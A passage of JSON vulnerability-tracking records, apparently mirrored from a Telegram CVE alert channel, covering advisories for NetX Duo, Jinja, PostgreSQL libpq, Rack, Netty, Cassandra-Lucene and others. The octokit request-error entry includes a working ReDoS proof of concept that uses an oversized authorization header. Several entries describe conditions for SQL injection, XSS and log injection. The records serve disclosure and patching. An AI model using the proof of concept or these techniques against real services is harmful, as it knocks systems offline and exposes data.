"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JF6X-9MGC-P72W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4913", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0727\n\ud83d\udd25 CVSS Score: 5.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: In NetX HTTP server functionality of Eclipse ThreadX NetX Duo before \nversion 6.4.2, an attacker can cause an integer underflow and a \nsubsequent denial of service by writing a very large file, by specially \ncrafted packets with Content-Length in one packet smaller than the data \nrequest size of the other packet. A possible workaround is to disable \nHTTP PUT support.\n\ud83d\udccf Published: 2025-02-21T08:19:11.412Z\n\ud83d\udccf Modified: 2025-02-21T15:34:39.515Z\n\ud83d\udd17 References:\n1. https://github.com/eclipse-threadx/netxduo/commit/c78d650be7377aae1a8704bc0ce5cc6f9f189014\n2. https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-jf6x-9mgc-p72w", "creation_timestamp": "2025-02-21T16:18:29.000000Z"}, {"uuid": "e407bcf1-bc31-4192-835c-4c961cf4d26e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-248V-346W-9CWC", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/3936", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-39689\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store.\n\nGLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI).\n\ud83d\udccf Published: 2024-07-05T20:06:40Z\n\ud83d\udccf Modified: 2025-02-11T22:38:18Z\n\ud83d\udd17 References:\n1. https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-39689\n3. https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\n4. https://github.com/certifi/python-certifi\n5. https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI\n6. https://security.netapp.com/advisory/ntap-20241206-0001", "creation_timestamp": "2025-02-11T23:11:32.000000Z"}, {"uuid": "36569bcd-cd31-48b5-97b3-af24a12e7cf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52RF-25HQ-5M33", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3935", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-32037\n\ud83d\udd25 CVSS Score: 5.3 (CVSS_V3)\n\ud83d\udd39 Description: ### Impact\n\nThe search end-point response headers contain information about Elasticsearch software in use. This information is sensitive from a security point of view because it allows software used by the server to be easily identified.\n\n### Patches\n\nGeoNetwork 4.4.5 / 4.2.10\n\n### Workarounds\n\nNone\n\n### References\n- [CVE-2024-32037](https://www.cve.org/CVERecord?id=CVE-2024-32037)\n- [Search service](https://docs.geonetwork-opensource.org/4.4/api/search/)\n\n### Credits\n\n- [Ministry of Economic Affairs and Climate Policy](https://www.rijksoverheid.nl/ministeries/ministerie-van-economische-zaken-en-klimaat), The Netherlands.\n\ud83d\udccf Published: 2025-02-11T22:47:11Z\n\ud83d\udccf Modified: 2025-02-11T22:47:11Z\n\ud83d\udd17 References:\n1. https://github.com/geonetwork/core-geonetwork/security/advisories/GHSA-52rf-25hq-5m33\n2. https://docs.geonetwork-opensource.org/4.4/api/search\n3. https://github.com/geonetwork/core-geonetwork\n4. https://www.cve.org/CVERecord?id=CVE-2024-32037", "creation_timestamp": "2025-02-11T23:11:20.000000Z"}, {"uuid": "2c1ebcce-9f63-4cd4-96fb-62fce1fda055", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0045", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/5260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-02-25T08:07:16.415Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6122\n11. https://access.redhat.com/errata/RHSA-2024:6708\n12. https://access.redhat.com/errata/RHSA-2024:6818\n13. https://access.redhat.com/errata/RHSA-2024:6824\n14. https://access.redhat.com/errata/RHSA-2024:7164\n15. https://access.redhat.com/errata/RHSA-2024:7174\n16. https://access.redhat.com/errata/RHSA-2024:7182\n17. https://access.redhat.com/errata/RHSA-2024:7187\n18. https://access.redhat.com/errata/RHSA-2024:7922\n19. https://access.redhat.com/errata/RHSA-2024:7941\n20. https://access.redhat.com/errata/RHSA-2024:8260\n21. https://access.redhat.com/errata/RHSA-2024:8425\n22. https://access.redhat.com/errata/RHSA-2024:9097\n23. https://access.redhat.com/errata/RHSA-2024:9098\n24. https://access.redhat.com/errata/RHSA-2024:9102\n25. https://access.redhat.com/errata/RHSA-2024:9960\n26. https://access.redhat.com/security/cve/CVE-2024-3727\n27. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-02-25T08:25:24.000000Z"}, {"uuid": "afcd4afa-306e-4389-91cb-599573365e39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79V4-65XG-PQ4G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3933", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12797\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: pyca/cryptography's wheels include a statically linked copy of OpenSSL. The versions of OpenSSL included in cryptography 42.0.0-44.0.0 are vulnerable to a security issue. More details about the vulnerability itself can be found in https://openssl-library.org/news/secadv/20250211.txt.\n\nIf you are building cryptography source (\"sdist\") then you are responsible for upgrading your copy of OpenSSL. Only users installing from wheels built by the cryptography project (i.e., those distributed on PyPI) need to update their cryptography versions.\n\ud83d\udccf Published: 2025-02-11T18:06:42Z\n\ud83d\udccf Modified: 2025-02-11T21:41:35Z\n\ud83d\udd17 References:\n1. https://github.com/pyca/cryptography/security/advisories/GHSA-79v4-65xg-pq4g\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-12797\n3. https://github.com/openssl/openssl/commit/738d4f9fdeaad57660dcba50a619fafced3fd5e9\n4. https://github.com/openssl/openssl/commit/798779d43494549b611233f92652f0da5328fbe7\n5. https://github.com/openssl/openssl/commit/87ebd203feffcf92ad5889df92f90bb0ee10a699\n6. https://github.com/pyca/cryptography\n7. https://openssl-library.org/news/secadv/20250211.txt\n8. http://www.openwall.com/lists/oss-security/2025/02/11/3", "creation_timestamp": "2025-02-11T22:07:42.000000Z"}, {"uuid": "56bf19a0-9542-47a6-808d-25e00e74c443", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6FGM-X6FF-W78F", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4138", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-6fgm-x6ff-w78f\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ### Impact\n\nChains using affected versions of Packet Forward Middleware in their IBC Transfer stack are vulnerable to an attack in which there is a potential denial of service. This affects IBC transfers for any asset which is being transferred between another chain and its native chain.\n\nWe recommend upgrading as soon as possible.\n\n__THIS IS A STATE BREAKING CHANGE__\n\n\n### Patches\nVersions [7.2.1](https://github.com/cosmos/ibc-apps/releases/tag/middleware%2Fpacket-forward-middleware%2Fv7.2.1) and [8.1.1](https://github.com/cosmos/ibc-apps/releases/tag/middleware%2Fpacket-forward-middleware%2Fv8.1.1) are patched.\n\n### Workarounds\nN/A\n\n### References\nN/A\n\ud83d\udccf Published: 2025-02-12T22:01:24Z\n\ud83d\udccf Modified: 2025-02-12T22:01:24Z\n\ud83d\udd17 References:\n1. https://github.com/cosmos/ibc-apps/security/advisories/GHSA-6fgm-x6ff-w78f\n2. https://github.com/cosmos/ibc-apps\n3. https://github.com/cosmos/ibc-apps/releases/tag/middleware%2Fpacket-forward-middleware%2Fv7.2.1\n4. https://github.com/cosmos/ibc-apps/releases/tag/middleware%2Fpacket-forward-middleware%2Fv8.1.1", "creation_timestamp": "2025-02-12T22:09:48.000000Z"}, {"uuid": "5db8acd7-ee0e-423b-8884-d78c0eee97c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5C8-RQWP-CP95", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4342", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-22195\n\ud83d\udd25 CVSS Score: 5.3 (CVSS_V3)\n\ud83d\udd39 Description: The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix.\n\ud83d\udccf Published: 2024-01-11T15:20:48Z\n\ud83d\udccf Modified: 2025-02-13T19:31:33Z\n\ud83d\udd17 References:\n1. https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\n2. https://nvd.nist.gov/vuln/detail/CVE-2024-22195\n3. https://github.com/pallets/jinja/commit/716795349a41d4983a9a4771f7d883c96ea17be7\n4. https://github.com/pallets/jinja\n5. https://github.com/pallets/jinja/releases/tag/3.1.3\n6. https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html\n7. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2\n8. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP\n9. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3", "creation_timestamp": "2025-02-13T20:15:37.000000Z"}, {"uuid": "f4641ad6-385c-4fe6-ab92-aa70de78f18b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1468", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4352", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11831\n\ud83d\udd25 CVSS Score: 5.4 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.\n\ud83d\udccf Published: 2025-02-10T18:30:47Z\n\ud83d\udccf Modified: 2025-02-13T22:16:34Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-11831\n2. https://github.com/yahoo/serialize-javascript/pull/173\n3. https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e\n4. https://access.redhat.com/errata/RHSA-2025:1334\n5. https://access.redhat.com/errata/RHSA-2025:1468\n6. https://access.redhat.com/security/cve/CVE-2024-11831\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2312579\n8. https://github.com/yahoo/serialize-javascript", "creation_timestamp": "2025-02-13T23:10:40.000000Z"}, {"uuid": "17d5f91d-f8a3-4490-ae49-58a4b44a8562", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:1334", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4352", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11831\n\ud83d\udd25 CVSS Score: 5.4 (CVSS_V3)\n\ud83d\udd39 Description: A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.\n\ud83d\udccf Published: 2025-02-10T18:30:47Z\n\ud83d\udccf Modified: 2025-02-13T22:16:34Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2024-11831\n2. https://github.com/yahoo/serialize-javascript/pull/173\n3. https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e\n4. https://access.redhat.com/errata/RHSA-2025:1334\n5. https://access.redhat.com/errata/RHSA-2025:1468\n6. https://access.redhat.com/security/cve/CVE-2024-11831\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2312579\n8. https://github.com/yahoo/serialize-javascript", "creation_timestamp": "2025-02-13T23:10:40.000000Z"}, {"uuid": "12ea7b06-f09c-44e9-a5c9-9d8ec5d8f99a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X8CX-3HQ5-4WJ9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4356", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25195\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2025-02-13T22:15:13.100\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/commit/50256f48314250978f521ef439cafa704e056539\n2. https://github.com/zulip/zulip/commit/75be449d456d29fef27e9d1828bafa30174284b4\n3. https://github.com/zulip/zulip/commit/a2a1a7f8d152296c8966f1380872c0ac69e5c87e\n4. https://github.com/zulip/zulip/security/advisories/GHSA-x8cx-3hq5-4wj9", "creation_timestamp": "2025-02-13T23:11:16.000000Z"}, {"uuid": "74bc771b-304a-46cc-bab0-58058b73ad11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRQP-Q7VX-V2CX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4386", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26511\n\ud83d\udd25 CVSS Score: 8.7 (CVSS_V3)\n\ud83d\udd39 Description: **Summary / Details**\nSystems running the Instaclustr fork of Stratio's Cassandra-Lucene-Index plugin versions 4.0-rc1-1.0.0 through 4.0.16-1.0.0 and 4.1.0-1.0.0 through 4.1.8-1.0.0, installed into Apache Cassandra version 4.x, are susceptible to a vulnerability which when successfully exploited could allow authenticated Cassandra users to remotely bypass RBAC to access data and and escalate their privileges. \n\n**Affected Versions**\n- Cassandra-Lucene-Index plugin versions 4.0-rc1-1.0.0 through 4.0.16-1.0.0 \n- versions 4.1.0-1.0.0 through 4.1.8-1.0.0\nwhen installed into Apache Cassandra version 4.x.\n\n**Required Configuration for Exploit**\nThese are the conditions required to enable exploit:\n1. Cassandra 4.x\n2. Vulnerable version of the Cassandra-Lucene-Index plugin configured for use\n3. Data added to tables\n4. Lucene index created\n5. Cassandra flush has run\n\n**Mitigation/Prevention**\nMitigation requires dropping all Lucene indexes and stopping use of the plugin. Exploit will be possible any time the required conditions are met.\n\n**Solution**\nUpgrade to a fixed version of the Cassandra-Lucene-Index plugin.  \nReview users in Cassandra to validate all superuser privileges.\n\ud83d\udccf Published: 2025-02-13T17:16:27Z\n\ud83d\udccf Modified: 2025-02-14T00:32:57Z\n\ud83d\udd17 References:\n1. https://github.com/instaclustr/cassandra-lucene-index/security/advisories/GHSA-mrqp-q7vx-v2cx\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-26511\n3. https://github.com/instaclustr/cassandra-lucene-index/commit/94380b165bd3e597d3e22e47f8cc674ec7c7bf7f\n4. https://github.com/instaclustr/cassandra-lucene-index", "creation_timestamp": "2025-02-14T01:13:03.000000Z"}, {"uuid": "0e4dfcc4-cb2f-4fd6-8f02-53b389471f9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XX4V-PRFH-6CGC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4466", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-xx4v-prfh-6cgc\n\ud83d\udd25 CVSS Score: 5.3 (CVSS_V3)\n\ud83d\udd39 Description: ### Summary\nA Regular Expression Denial of Service (ReDoS) vulnerability exists in the processing of HTTP request headers. By sending an authorization header containing an excessively long sequence of spaces followed by a newline and \"@\", an attacker can exploit inefficient regular expression processing, leading to excessive resource consumption. This can significantly degrade server performance or cause a denial-of-service (DoS) condition, impacting availability.\n### Details\nThe issue occurs at [line 52](https://github.com/octokit/request-error.js/blob/main/src/index.ts) of iterator.ts in the @octokit/request-error repository.\nThe vulnerability is caused by the use of an inefficient regular expression in the handling of the `authorization` header within the request processing logic:\n```js\nauthorization: options.request.headers.authorization.replace(\n  / .*$/, \n  \" [REDACTED]\"\n)\n```\nThe regular expression `/ .*$/` matches a space followed by any number of characters until the end of the line. This pattern is vulnerable to Regular Expression Denial of Service (ReDoS) when processing specially crafted input. Specifically, an attacker can send an `authorization` header containing a long sequence of spaces followed by a newline and \"@\", such as:\n```js\nheaders: {\n  authorization: \"\" + \" \".repeat(100000) + \"\\n@\",\n}\n```\nDue to the way JavaScript's regular expression engine backtracks while attempting to match the space followed by arbitrary characters, this input can cause excessive CPU usage, significantly slowing down or even freezing the server. This leads to a denial-of-service condition, impacting availability.\n### PoC\n[The gist of PoC.js](https://gist.github.com/ShiyuBanzhou/e1203ad22701fd043b8501eb37676a0d)\n1. run npm i @octokit/request-error\n2. run 'node poc.js'\nresult:\n3. then the program will stuck forever with high CPU usage\n```js\nimport { RequestError } from \"@octokit/request-error\";\n\nconst error = new RequestError(\"Oops\", 500, {\n  request: {\n    method: \"POST\",\n    url: \"https://api.github.com/foo\",\n    body: {\n      bar: \"baz\",\n    },\n    headers: {\n      authorization: \"\"+\" \".repeat(100000)+\"\\n@\",\n    },\n  },\n  response: {\n    status: 500,\n    url: \"https://api.github.com/foo\",\n    headers: {\n      \"x-github-request-id\": \"1:2:3:4\",\n    },\n    data: {\n      foo: \"bar\",\n    },\n  },\n});\n```\n\n### Impact\n#### Vulnerability Type &amp; Impact:\nThis is a `Regular Expression Denial of Service (ReDoS) vulnerability`, which occurs due to an inefficient regular expression (`/ .*$/`) used to sanitize the `authorization` header. An attacker can craft a malicious input that triggers excessive backtracking in the regex engine, leading to high CPU consumption and potential denial-of-service (DoS).\n#### Who is Impacted?\n* Projects or services using this code to process HTTP headers are vulnerable.\n* Applications that rely on user-supplied `authorization` headers are at risk, especially those processing a large volume of authentication requests.\n* Multi-tenant or API-driven platforms could experience degraded performance or service outages if exploited at scale.\n\ud83d\udccf Published: 2025-02-14T17:58:54Z\n\ud83d\udccf Modified: 2025-02-14T17:58:55Z\n\ud83d\udd17 References:\n1. https://github.com/octokit/request-error.js/security/advisories/GHSA-xx4v-prfh-6cgc\n2. https://github.com/octokit/request-error.js/commit/d558320874a4bc8d356babf1079e6f0056a59b9e\n3. https://github.com/octokit/request-error.js", "creation_timestamp": "2025-02-14T18:12:03.000000Z"}, {"uuid": "d1fc620f-1d89-4f93-8118-223d3c50fc7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHW9-X46C-V6Q4", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/4617", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: GHSA-mhw9-x46c-v6q4\n\ud83d\udd25 CVSS Score: 8.1 (CVSS_V3)\n\ud83d\udd39 Description: Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns.  Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal.  Similarly, improper neutralization of quoting syntax in PostgreSQL command line utility programs allows a source of command line arguments to achieve SQL injection when client_encoding is BIG5 and server_encoding is one of EUC_TW or MULE_INTERNAL.  Versions before PostgreSQL 17.3, 16.7, 15.11, 14.16, and 13.19 are affected.\n\ud83d\udccf Published: 2025-02-13T15:31:25Z\n\ud83d\udccf Modified: 2025-02-16T21:31:43Z\n\ud83d\udd17 References:\n1. https://nvd.nist.gov/vuln/detail/CVE-2025-1094\n2. https://lists.debian.org/debian-lts-announce/2025/02/msg00015.html\n3. https://www.postgresql.org/support/security/CVE-2025-1094\n4. http://www.openwall.com/lists/oss-security/2025/02/16/3", "creation_timestamp": "2025-02-17T00:20:12.000000Z"}, {"uuid": "4af59191-4d1f-4907-8fe7-e6b974ee2b90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-248V-346W-9CWC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4516", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-39689\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: No description available\n\ud83d\udccf Published: 2024-07-05T19:15:10.247\n\ud83d\udccf Modified: N/A\n\ud83d\udd17 References:\n1. https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\n2. https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc\n3. https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI\n4. https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\n5. https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc\n6. https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI\n7. https://security.netapp.com/advisory/ntap-20241206-0001/", "creation_timestamp": "2025-02-15T01:10:32.000000Z"}, {"uuid": "dfa1d9ab-8355-4efa-9716-b3342528845f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G2V-JJ9Q-G3RG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4508", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25184\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: ## Summary\n\n`Rack::CommonLogger` can be exploited by crafting input that includes newline characters to manipulate log entries. The supplied proof-of-concept demonstrates injecting malicious content into logs.\n\n## Details\n\nWhen a user provides the authorization credentials via `Rack::Auth::Basic`, if success, the username will be put in `env['REMOTE_USER']` and later be used by `Rack::CommonLogger` for logging purposes.\n\nThe issue occurs when a server intentionally or unintentionally allows a user creation with the username contain CRLF and white space characters, or the server just want to log every login attempts. If an attacker enters a username with CRLF character, the logger will log the malicious username with CRLF characters into the logfile.\n\n## Impact\n\nAttackers can break log formats or insert fraudulent entries, potentially obscuring real activity or injecting malicious data into log files.\n\n## Mitigation\n\n- Update to the latest version of Rack.\n\ud83d\udccf Published: 2025-02-12T19:18:35Z\n\ud83d\udccf Modified: 2025-02-14T22:16:55Z\n\ud83d\udd17 References:\n1. https://github.com/rack/rack/security/advisories/GHSA-7g2v-jj9q-g3rg\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-25184\n3. https://github.com/rack/rack/commit/074ae244430cda05c27ca91cda699709cfb3ad8e\n4. https://github.com/rack/rack\n5. https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2025-25184.yml", "creation_timestamp": "2025-02-14T23:10:45.000000Z"}, {"uuid": "7a2a3c9b-3555-4036-9c28-ba7e98c36baa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ3W-V528-46RV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4455", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25193\n\ud83d\udd25 CVSS Score: 5.4 (CVSS_V3)\n\ud83d\udd39 Description: ### Summary\nAn unsafe reading of environment file could potentially cause a denial of service in Netty.\nWhen loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.\n\n### Details\nA similar issue was previously reported in https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv\nThis issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit.\n\n\n### PoC\nThe PoC is the same as for https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv with the detail that the file should only contain null-bytes; 0x00.\nWhen the null-bytes are encountered by the `InputStreamReader`, it will issue replacement characters in its charset decoding, which will fill up the line-buffer in the `BufferedReader.readLine()`, because the replacement character is not a line-break character.\n\n### Impact\nImpact is the same as https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv\n\ud83d\udccf Published: 2025-02-10T18:14:47Z\n\ud83d\udccf Modified: 2025-02-14T15:02:31Z\n\ud83d\udd17 References:\n1. https://github.com/netty/netty/security/advisories/GHSA-389x-839f-4rhx\n2. https://nvd.nist.gov/vuln/detail/CVE-2025-25193\n3. https://github.com/netty/netty/commit/d1fbda62d3a47835d3fb35db8bd42ecc205a5386\n4. https://github.com/netty/netty", "creation_timestamp": "2025-02-14T15:15:16.000000Z"}, {"uuid": "1c11ce6e-853d-4a60-a636-6887ba2f1bda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389X-839F-4RHX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/4455", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25193\n\ud83d\udd25 CVSS Score: 5.4 (CVSS_V3)\n\ud83d\udd39 Description: ### Summary\nAn unsafe reading of environment file could potentially cause a denial of service in Netty.\nWhen loaded on an Windows application, Netty attemps to load a file that does not exist. If an attacker creates such a large file, the Netty application crash.\n\n### Details\nA similar issue was previously reported in https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv\nThis issue was fixed, but the fix was incomplete in that null-bytes were not counted against the input limit.\n\n\n### PoC\nThe PoC is the same as for https://github.com/netty/netty/security/advisories/GHSA-xq3w-v528-46rv with the detail that the file should only contain null-bytes; 0x00.\nWhen the null-bytes are encountered by the `InputStreamReader`, it will issue replacement characters in its charset decoding, which will fill up the line-buffer in the `BufferedReader.readLine()`, because the replacement character is not a line-break character.\n\n### Impact\nImpact is the same as 